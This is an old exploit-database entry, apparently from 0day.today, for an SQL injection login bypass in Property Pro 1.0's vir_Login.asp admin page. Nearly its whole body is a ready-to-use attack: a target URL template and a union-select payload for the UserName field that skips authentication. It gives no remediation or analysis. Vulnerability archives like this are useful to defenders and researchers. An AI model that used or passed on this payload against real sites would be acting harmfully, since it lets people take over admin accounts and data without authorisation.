id: 1159
date: 11/13/2006
title: Property Pro 1.0 (vir_Login.asp) Remote Login Bypass Vulnerability
author: ajann
cves: 

==================================================================
Property Pro 1.0 (vir_Login.asp) Remote Login Bypass Vulnerability
==================================================================



*******************************************************************************
# Title  :  Property Pro v1.0 (vir_Login.asp) Remote Login ByPass SQL Injection Vulnerability
# Author :   ajann
*******************************************************************************
Example:

###http://[target]/[path]/admin/

UserName: ' union select 0,0 from admin


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!



#  0day.today [2023-03-25]  #